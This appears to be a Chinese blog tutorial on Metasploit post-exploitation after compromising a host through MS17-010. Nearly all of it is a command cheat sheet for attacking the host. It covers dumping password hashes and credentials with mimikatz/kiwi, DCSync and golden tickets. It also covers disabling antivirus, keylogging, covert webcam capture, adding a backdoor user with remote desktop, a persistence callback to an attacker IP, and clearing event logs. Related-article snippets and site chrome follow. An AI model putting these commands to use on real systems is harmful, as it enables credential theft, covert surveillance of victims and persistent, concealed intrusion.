Metaaploit-后渗透技知识

最新推荐文章于 2024-05-31 11:49:50 发布
最新推荐文章于 2024-05-31 11:49:50 发布
阅读量384 收藏
点赞数 1
文章标签: linux 服务器 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54217950/article/details/125841393
版权

后渗透阶段

在上一章节通过MS17-010漏洞我们拿到了靶机权限:
在这里插入图片描述

要想从meterpreter退出到MSF框架,输入:background
输入: sessions -l 查看我们获得的shell,前面有id
输入: sessions -i 1 即可切换到id为1的shell

sysinfo #查看目标主机系统信息 
run scraper #查看目标主机详细信息 
run hashdump #导出密码的哈希 
load kiwi #加载mimikatz 
ps #查看目标主机进程信息 
pwd #查看目标当前目录(windows) 
getlwd #查看目标当前目录(Linux) 
search -f *.jsp -d e:\ #搜索E盘中所有以.jsp为后缀的文件  
download e:\test.txt /root #将目标机的e:\test.txt文件下载到/root目录下
upload /root/test.txt d:\test #将/root/test.txt上传到目标机的 d:\test\ 目录下 
getpid #查看当前Meterpreter Shell的进程PID 
migrate 1384 #将当前Meterpreter Shell的进程迁移到PID为1384的进程上 
idletime #查看主机运行时间 getuid #查看获取的当前权限 
getsystem #提权,获得的当前用户是administrator才能成功 
run killav #关闭杀毒软件 
screenshot #截图 
webcam_list #查看目标主机的摄像头 
webcam_snap #拍照 
webcam_stream #开视频 execute 参数 -f 可执行文件 #执行可执行程序 
run getgui -u hack -p 123 #创建hack用户,密码为123 
run getgui -e #开启远程桌面 
keyscan_start #开启键盘记录功能 keyscan_dump #显示捕捉到的键盘记录信息 
keyscan_stop #停止键盘记录功能 
uictl disable keyboard #禁止目标使用键盘 
uictl enable keyboard #允许目标使用键盘 
uictl disable mouse #禁止目标使用鼠标 
uictl enable mouse #允许目标使用鼠标 
load #使用扩展库 
run #使用扩展库 
run persistence -X -i 5 -p 4444 -r 192.168.10.27 #反弹时间间隔是5s 会自动连接 192.168.27的4444端口,缺点是容易被杀毒软件查杀 
portfwd add -l 3389 -r 192.168.11.13 -p 3389 #将192.168.11.13的3389端口转发到本 地的3389端口上,这里的192.168.11.13是获取权限的主机的ip地址
clearev #清除日志

获取用户密码

#抓取自动登录的密码 
run windows/gather/credentials/windows_autologin 
#导出密码哈希hashdump 模块可以从SAM数据库中导出本地用户账号
执行: run hashdump或run windows/gather/smart_hashdump 该命令的使用需要系统权限 
#亦或者上传mimikatz程序,先getsystem提权至系统权限,然后执行 
execute -i -f mimikatz.exe ,进入mimikatz的交互界面 privilege::debug sekurlsa::logonpasswords

MSF mimikata使用:
加载kiwi模块 load kiwi 
查看kiwi模块的使用 help kiwi 
creds_all ##列举所有凭据 
creds_kerberos ##列举所有kerberos凭据 
creds_msv ##列举所有msv凭据 
creds_ssp ##列举所有ssp凭据 
creds_tspkg ##列举所有tspkg凭据 
creds_wdigest ##列举所有wdigest凭据 
dcsync ##通过DCSync检索用户帐户信息 
dcsync_ntlm ##通过DCSync检索用户帐户NTLM散列、SID和RID 
golden_ticket_create ##创建黄金票据
kerberos_ticket_list ##列举kerberos票据 
kerberos_ticket_purge ##清除kerberos票据 
kerberos_ticket_use ##使用kerberos票据 kiwi_cmd ##执行
mimikatz的命令,后面接mimikatz.exe的命令 
lsa_dump_sam ##dump出lsa的SAM 
lsa_dump_secrets ##dump出lsa的密文 
password_change ##修改密码 
wifi_list ##列出当前用户的wifi配置文件 
wifi_list_shared ##列出共享wifi配置文件/编码

导入并执行PowerShell脚本

load powershell #加载powershell功能 
powershell_import /root/PowerView.ps1 #导入powershell脚本,提前将该powershell脚 本放到指定目录 
powershell_execute Get-NetDomain #执行该脚本下的功能模块Get-domain,该模块用 于获取域信息,一个脚本下通常有多个功能模块 
powershell_execute Invoke-UserHunter #该功能模块用于定位域管理员登录的主机 
powershell_execute Get-NetForest #该模块用于定位域信息 
powershell_execute Get-NetLocalGroup #查看本地组 
powershell_execute Get-NetLocalGroup #枚举本地(或远程)机器上的本地组 powershell_execute Get-
NetLocalGroupMember #枚举本地(或远程)机器上特定本地组的成员 
powershell_execute Get-NetShare #返回本地(或远程)机器上的打开共享 
powershell_execute Get-NetLoggedon #返回登录本地(或远程)机器的用户 
powershell_execute Get-NetSession #返回本地(或远程)机器的会话信息
注意:如果powershell脚本是用于域内信息收集的,则获取到的权限用户需要是域用户
不会就跑路的小白
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
metasploit 简单使用教程
weixin_48103302的博客
08-28 840
metasploit 使用教程前言一、Metasploit是什么?二、准备工作三、具体步骤 前言 Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。 在启动MSF终端之后,可以首先输入help命令列出MSF终端所支持的命令列表,包括核心命令集和后端数据库命令集。对于其中的大部.
Web安全攻防渗透测试
m0_63223219的博客
04-05 6769
1. Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.168.1.1/24 ...
2018-2019 2 20165203 《网络对抗术》Exp5 MSF基础
weixin_30877493的博客
04-15 118
2018-2019 2 20165203 《网络对抗术》Exp5 MSF基础 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成: 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050;(1分) 1.3 一个针对客户端的攻击,如Adobe;(1分) 1.4 成功应用任何一个辅助模块...
资深渗透测试工程师的渗透巧总结(67个Tips)
tzyyyyyy的博客
11-16 1375
本质上是DLL文件,后缀名为cpl,包含一个导出函数CPLApplet(c实现可不指定)执行方法:(1)双击直接运行(2)cmd(3)cmd(4)vbsDim obj(5)js参考:《CPL文件利用介绍》
Metasploit入门教程(非常详细)从零基础入门到精通,看完这一篇就够了!
m0_74131821的博客
05-27 2503
Metasploit之所以流行,是因为它可以执行广泛的安全测试任务,从而简化渗透测试的工作。Metasploit 适用于所有流行的操作系统,本文中,主要以Kali Linux为主。因为Kali Linux预装了 Metasploit框架和运行在框架上的其他第三方工具
Metasploit教程
abcywchiu的博客
09-12 1106
1.攻击过程举例:https://blog.csdn.net/u011467044/article/details/53324091 2.metasploit教材:https://book.2cto.com/201309/32553.html
Metatsploit 渗透测试二 | MS10-018漏洞利用
LALAAYANG的博客
10-30 577
Metatsploit 渗透测试二 | MS10-018漏洞利用问题概述执行过程 问题概述 利用MS10-018漏洞,进行IE 6浏览器渗透攻击,获得目标节点的shell。 执行过程 设置参数后,攻击成功,当前进程在LENOVO-A102EA8A\Administrator: 查看对话,获取shell: ...
来自GitHub的系列渗透测试工具
qq_53058639的博客
02-07 1191
Printer Exploitation Toolkit (PRET) - 用于打印机安全测试的工具,能够进行IP和USB连接,模糊测试以及利用PostScript,PJL和PCL打印机语言功能。THC Hydra - 在线密码破解工具,内置支持许多网络协议,包括HTTP,SMB,FTP,telnet,ICQ,MySQL,LDAP,IMAP,VNC等。PacketTotal - 简单,免费,高质量的数据包捕获文件分析,有助于快速检测网络传播的恶意软件(使用Bro和Suricata IDS签名)。
开源安全测试工具 | 网络安全工具列表
热门推荐
网络安全
12-29 2万+
• x-crack (https://github.com/netxfly/x-crack) - x-crack - 弱密码扫描器,支持:FTP/SSH/SNMP/MSSQL/MYSQL/PostGreSQL/REDIS/ElasticSearch/MONGODB。• CVE-2015-2426 (https://github.com/vlad902/hacking-team-windows-kernel-lpe) - MS-078,EXP (windows内核提权)。
渗透测试Metasploit框架体验(3. MsfVenom生成后门木马)
weixin_51803729的博客
02-11 7291
渗透测试Metasploit框架体验(3. MsfVenom生成后门木马)
Metasploit Framework载荷生成过程源码分析
Niatruc的博客
04-07 754
摘要 在Metasploit中,一段编码载荷的总体生成流程是: 将不同汇编代码片段组成载荷汇编代码,并编译成机器码。 生成解码器存根。 将原始载荷机器码按4字节对齐,并用编码器编码。 生成nop雪橇。 最终shellcode:nop雪橇 + 解码器存根(除去最后的0-4个字节, 这些拼到payload中来对齐) + 编码后的payload。 编码器: 用于消除载荷中的坏字节(如’\x00’), 以及为载荷编码。而去除坏字节的方式即是进行编码,而非传统的将push 0替换成xor ecx, ecx和p
Linux - 磁盘的分区和挂载
weixin_45735487的博客
05-27 802
逻辑分区只能在拓展分区上划分,编号5-15。拓展分区编号1-4,拓展分区不能格式化。rescue 恢复分区,对于误删的分区进行恢复,语法: rescue 起始 结束。rm 删除分区,后接要删除的分区编号。(L) 在主分区和拓展分区划分完之后,默认提示划分逻辑分区。n 进行磁盘分区,这里会默认MBR标签。(p) msdos下,会默认选择先划分主分区。
linux 之dma_buf (4)- mmap
z20230508的博客
05-28 926
前面几篇都是在 kernel space 对 dma-buf 进行访问的,本篇我们将一起来学习,如何在 user space 访问 dma-buf。当然,user space 访问 dma-buf 也属于 CPU Access 的一种。
FTP协议——LightFTP安装(Linux
计算机硕士的博客
05-27 356
FTP协议——LightFTP安装(Linux)。
Linux】升级GCC(版本9.3),补充:binutils
yannan20190313的博客
05-27 842
Linux】升级GCC(版本9.3),补充:binutils
linux 硬盘
XH722DF的博客
05-27 557
主引导记录 一共446字节一般在操作系统安装时写入主引导记录 MBR就是一个引导程序检测磁盘的分区是否合法(工作正常)加载操作系统 作用 识别可用的分区 在系统开机时 识别操作系统。硬盘的最小存储单位 : 扇区 扇区的最小存储单位是512kb 连续的扇区组成磁道 读写都是围绕磁道进行。先有扩展分区 才能创建逻辑分区 逻辑分区是没有限制的 扩展分区只能创建1个。2. 数据的保护 文件系统可以通过权限控制 是不同的用户对文件拥有不同的权限。
Linux】中常见的重要指令(下)以及重要的几个热键
2401_84568462的博客
05-27 1242
find指令查找的文件不能当前路径下(可以这样理解:如果要查找当前路径下可以使用ls指令,就不麻烦find指令了),必须查找当前路径下的目录里的文件。1.能被打包压缩的一定是由多个文件组成的,打包压缩后将文件变为一个整体,在传递给其他用户时不容易缺失。.tar打包后缀 .gz压缩后缀 XXX.tar.gz ----->XXX.tgz。功能:在系统特定的路径下查找,及可以找到可执行程序,有可以找到手册,安装包和压缩包等。命令在目录结构中搜索文件,并执行指定的操作。功能:在指令路径下搜索指令文件。
Linux中部署MinIO
最新发布
weixin_42691754的博客
05-31 258
以上步骤会启动一个MinIO服务器实例,你可以通过浏览器访问http://your-server-ip:9000来使用MinIO的管理界面。
Linux中tomcat占用内存过高可以通过导出hprof日志来解决
weixin_43268590的博客
05-30 388
Linux中tomcat占用内存过高可以通过导出hprof日志来解决
Linux —— 文件系统
学习C++的小陈同学
05-28 1115
本篇整理总结了关于文件系统和软硬链接的相关知识

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值